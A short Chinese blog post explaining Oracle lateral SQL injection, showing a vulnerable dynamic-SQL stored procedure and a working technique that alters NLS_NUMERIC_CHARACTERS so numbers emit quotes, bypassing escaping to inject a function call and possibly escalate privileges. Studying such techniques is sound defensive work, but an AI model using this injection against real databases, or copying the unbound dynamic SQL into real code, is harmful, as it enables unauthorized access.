ORACLE LATERAL-SQL-INJECTION 个人见解
ORACLE LATERAL-SQL-INJECTION 个人见解
发布时间:2016-12-28 来源:查字典编辑
摘要:如果直接执行SQL语句或者参数绑定则不用担心太多,如以下ORACLE存储过程createorreplaceprocedurekjdatepo...

如果直接执行SQL语句或者参数绑定则不用担心太多,

如以下ORACLE存储过程

createorreplaceprocedurekjdatepoc(dated)

as

begin

insertintokjdatetablevalues(d);

commit;

end;

根本不需要担心遭受到SQL新型注入攻击,那么在什么地方会发生DATE以及NUMBER的注入攻击呢!?一般都是采用了动态SQL而又不采用参数绑定的语句。

例如工程师经常用的DBMS_SQL或者EXECUTEIMMEDIATE

看以下存储过程

createorreplaceprocedurekjdatepoc(dated)

as

begin

executeimmediate‘insertintokjdatetablevalues('||d||')';

commit;

end;

那么遇到以上的存储过程或者函数等,也通过修改SESSION中的NLS_DATE_FORMAT中的值达到SQL注射的目的,

老外的PAPER讲解得非常详细了,我在这里也不废话。

惟独对于NUMBER类型的注射没有多作讲解只是简单演示了可以输出单引号!

看以下语句

ALTERSESSIONSETNLS_NUMERIC_CHARACTERS=”'.';

SELECTto_number(1000.10001,'999999D99999′)||”FROMDUAL;

输出一下结果

1000′10001

只是多了一个单引号,那有什么用呢?乐观的来说!在特定情况下是很有价值的!看以下一个存储过程

createorreplaceprocedureNumInjPoc(kjexpnumnumber,kjexpstrvarchar2)

is

SecStrvarchar2(1000);

begin

SecStr:=replace(kjexpstr,””,”””);

sys.dbms_output.put_line('SELECT*FROMDUALWHEREID='||kjexpnum||'andname=”'||SecStr||””);

end;

内部对varchar类型进行替换了!我们可以进行测试

begin

numinjpoc(1000,”'–');

end;

其输出SQL语句为

SELECT*FROMDUALWHEREID=1000andname=”'–'

单引号被转义掉了

那么如果我们结合这个NUMBER类型怎么进行注射呢?

ALTERSESSIONSETNLS_NUMERIC_CHARACTERS=”'.';

begin

numinjpoc(TO_NUMBER(0.10001,'999999D99999′),'||kj.exp()–');

end;

看看输出结果

SELECT*FROMDUALWHEREID='10001andname='||kj.exp()–'

这样就可以间接的攻击它…

在某中程度才来需要ALTERSESSION配合后,再去攻击系统内部的一些函数或者过程来提升权限。未尝不是一种好的突破思路,但是对于单语句进行SQL注射攻击,以结果为向导的话!这样的方式没多大作为。

推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
相关阅读
网友关注
最新Oracle教程学习
热门Oracle教程学习
编程开发子分类